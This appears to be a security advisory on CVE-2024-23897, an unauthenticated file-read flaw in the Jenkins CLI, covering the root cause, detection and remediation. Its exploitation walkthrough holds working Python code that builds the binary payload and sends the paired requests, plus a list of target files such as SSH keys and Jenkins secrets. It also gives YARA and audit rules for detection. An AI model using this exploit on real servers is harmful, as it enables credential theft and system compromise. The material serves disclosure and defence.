CVE-2024-23897: Critical Jenkins CLI File Read Vulnerability Enables Unauthenticated Remote Code Execution
Executive Summary
CVE-2024-23897 represents a critical security vulnerability affecting Jenkins automation servers that allows unauthenticated attackers to read arbitrary files from the Jenkins controller file system. With a CVSS score of 9.8, this vulnerability poses an immediate and severe threat to organizations running vulnerable Jenkins instances.
The vulnerability stems from Jenkins' CLI command parser failing to disable the expandAtFiles feature in the args4j library, which automatically replaces arguments beginning with '@' followed by a file path with the contents of that file. This seemingly innocuous feature becomes a devastating security flaw when exposed to unauthenticated users through Jenkins' CLI endpoint.
What's at risk:
- Complete system compromise through credential harvesting from configuration files
- Source code exfiltration from Jenkins workspaces and repositories
- Lateral movement capabilities via exposed SSH keys, database credentials, and internal network configurations
- Supply chain attacks through manipulation of CI/CD pipelines after gaining access
The vulnerability affects Jenkins 2.441 and earlier, along with LTS versions 2.426.2 and earlier, making millions of Jenkins instances worldwide potentially vulnerable. The unauthenticated nature of this exploit makes it particularly dangerous, as attackers require no prior access or credentials to begin exploitation.
Technical Deep Dive
Root Cause Analysis
The vulnerability exists in Jenkins' implementation of command-line argument parsing using the args4j library. By default, args4j enables the expandAtFiles feature, which is designed to allow users to specify file contents as command arguments by prefixing file paths with the '@' character.
// Vulnerable code pattern in Jenkins CLI parser
@Option(name = "--help", usage = "Show help")
private String helpArg;
// When args4j processes: --help @/etc/passwd
// It automatically reads /etc/passwd and uses its contents as the argument value
Jenkins' CLI endpoint (/cli?remoting=false) processes these arguments without proper sanitization or access controls, creating a direct file read primitive that bypasses authentication mechanisms.
Attack Vector Mechanics
The exploit leverages Jenkins' dual-connection CLI protocol:
- Upload Connection: Sends a specially crafted binary payload containing the CLI command and file path
- Download Connection: Retrieves the processed response containing file contents
The binary payload structure follows this pattern:
[Command Length][Command: "help"][Arg Length][File Path: "@/target/file"][Encoding Specs]
The critical component is the '@' prefix, which triggers args4j's file expansion feature, causing Jenkins to read the specified file and include its contents in the response.
Permission Model Bypass
Jenkins' permission model offers different levels of access:
- No permissions: Attackers can read the first 3 lines of any file
- Overall/Read permission: Attackers can read complete file contents
Even in the most restrictive scenario (no permissions), attackers can extract valuable information from file headers, including:
- User account information from
/etc/passwd - SSH key headers revealing key types and comments
- Configuration file structures and partial credentials
Exploitation Walkthrough
Prerequisites
- Network access to a Jenkins instance running version 2.441 or earlier (LTS 2.426.2 or earlier)
- Jenkins CLI interface enabled (default configuration)
- No authentication required
Step-by-Step Exploitation
Step 1: Target Identification
# Verify Jenkins version and CLI availability
curl -I http://target-jenkins:8080/cli?remoting=false
# Look for Jenkins version in Server header
Step 2: Session Establishment
import uuid
import requests
import threading
# Generate unique session ID
session_id = str(uuid.uuid4())
target_file = "/etc/passwd" # Target file to read
Step 3: Payload Construction
# Construct binary payload with file path
def create_payload(file_path):
data = b'\x00\x00\x00\x06\x00\x00\x04help' # CLI help command
data += b'\x00\x00\x00\x0e\x00\x00\x0c@' # File marker
data += file_path.encode() # Target file path
data += b'\x00\x00\x00\x05\x02\x00\x03GBK' # Encoding: GBK
data += b'\x00\x00\x00\x07\x01\x00\x05en_US' # Locale: en_US
data += b'\x00\x00\x00\x00\x03' # Terminator
return data
Step 4: Dual Request Execution
def upload_request(session_id, payload):
headers = {
'Session': session_id,
'Side': 'upload',
'Content-type': 'application/octet-stream'
}
response = requests.post(f'{target}/cli?remoting=false',
headers=headers, data=payload)
def download_request(session_id):
headers = {
'Session': session_id,
'Side': 'download'
}
response = requests.post(f'{target}/cli?remoting=false',
headers=headers)
return response.content
# Execute simultaneous requests
payload = create_payload(target_file)
upload_thread = threading.Thread(target=upload_request, args=(session_id, payload))
upload_thread.start()
# Retrieve file contents
file_contents = download_request(session_id)
High-Value Target Files
System Information:
/etc/passwd- User account information/etc/hosts- Network configuration/proc/version- Kernel and system details
Jenkins Configuration:
$JENKINS_HOME/config.xml- Main Jenkins configuration$JENKINS_HOME/secrets/- Encrypted secrets and keys$JENKINS_HOME/users/*/config.xml- User configurations
Credentials and Keys:
/root/.ssh/id_rsa- SSH private keys/home/*/.ssh/id_rsa- User SSH keys$JENKINS_HOME/secrets/initialAdminPassword- Initial admin password
Detection & Monitoring
YARA Rule for Payload Detection
rule CVE_2024_23897_Jenkins_CLI_FileRead_Exploit {
meta:
description = "Detects Jenkins CLI file read exploit payloads for CVE-2024-23897"
author = "Threat Detection Engineer"
date = "2024-01-24"
reference = "CVE-2024-23897"
severity = "critical"
tlp = "white"
strings:
$cli_help_command = { 00 00 00 06 00 00 04 68 65 6c 70 }
$at_file_marker = { 00 00 00 0e 00 00 0c 40 }
$encoding_gbk = { 00 00 00 05 02 00 03 47 42 4b }
$encoding_enus = { 00 00 00 07 01 00 05 65 6e 5f 55 53 }
$jenkins_cli_pattern = /\x00\x00\x00[\x06-\x20]\x00\x00\x04help\x00\x00\x00[\x0e-\x30]\x00\x00[\x0c-\x2c]@[\x2f\x5c][^\x00]{1,200}/
$file_path_linux = /@\/[a-zA-Z0-9_\-\/\.]+/
$file_path_windows = /@[A-Za-z]:\\[a-zA-Z0-9_\-\\\.]+/
$sensitive_files = /@\/(etc\/passwd|etc\/shadow|root\/|home\/|var\/log\/|proc\/)/
condition:
($cli_help_command and $at_file_marker) or
$jenkins_cli_pattern or
($file_path_linux and ($encoding_gbk or $encoding_enus)) or
$sensitive_files
}
Network-Based Detection
HTTP Request Signatures:
POST /cli?remoting=false
Content-Type: application/octet-stream
Session: [UUID-pattern]
Side: upload|download
Suspicious Patterns:
- Rapid sequential requests to
/cliendpoint with same Session ID - Binary payloads containing file path patterns after '@' character
- Requests with 'Side: upload' followed by 'Side: download'
Log Analysis Indicators
Jenkins Access Logs:
POST /cli?remoting=false - Frequent requests from same IP
Binary content in request body containing file paths
Session IDs being reused across multiple requests
System Log Monitoring:
# Monitor for unusual file access patterns
auditctl -w /etc/passwd -p r -k cve-2024-23897
auditctl -w /etc/shadow -p r -k cve-2024-23897
auditctl -w /root/.ssh/ -p r -k cve-2024-23897
Remediation Guidance
Immediate Actions (Priority 1)
1. Emergency Patching:
- Upgrade to Jenkins 2.442 or later
- For LTS users: Upgrade to 2.426.3 or later
- If immediate patching isn't possible, disable CLI interface:
# Add to Jenkins startup parameters -Djenkins.CLI.disabled=true
2. Network Isolation:
- Restrict access to Jenkins CLI endpoint (
/cli) at firewall/load balancer level - Implement IP allowlisting for Jenkins administrative access
- Consider moving Jenkins behind VPN for administrative functions
Configuration Hardening
3. Access Control Review:
- Audit user permissions, especially "Overall/Read" grants
- Implement principle of least privilege
- Review and revoke unnecessary administrative access
4. Monitoring Enhancement:
- Deploy YARA rules for payload detection
- Configure alerts for unusual CLI endpoint activity
- Implement file integrity monitoring for sensitive directories
Long-term Security Measures
5. Security Architecture:
- Isolate Jenkins controllers from sensitive network segments
- Implement secrets management solutions (HashiCorp Vault, AWS Secrets Manager)
- Regular security assessments and penetration testing
- Implement CI/CD pipeline security scanning
6. Incident Response Preparation:
- Develop specific playbooks for Jenkins compromise scenarios
- Establish communication channels for emergency patching
- Regular backup and recovery testing for Jenkins configurations
Verification Steps
After applying remediation:
# Verify patch level
curl -s http://jenkins:8080/api/json | grep version
# Test CLI disabling
curl -I http://jenkins:8080/cli?remoting=false
# Should return 404 or error if properly disabled
# Validate access controls
# Attempt file read exploit - should fail on patched systems
References
- NVD Entry: CVE-2024-23897
- Jenkins Security Advisory: SECURITY-3314
- CWE Reference: CWE-27: Path Traversal
- CVSS Calculator: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- args4j Documentation: Kohsuke args4j Library
The critical nature of CVE-2024-23897, combined with its unauthenticated attack vector and potential for complete system compromise, makes immediate remediation essential for all organizations running Jenkins infrastructure. Security teams should prioritize patching efforts and implement comprehensive monitoring to detect potential exploitation attempts.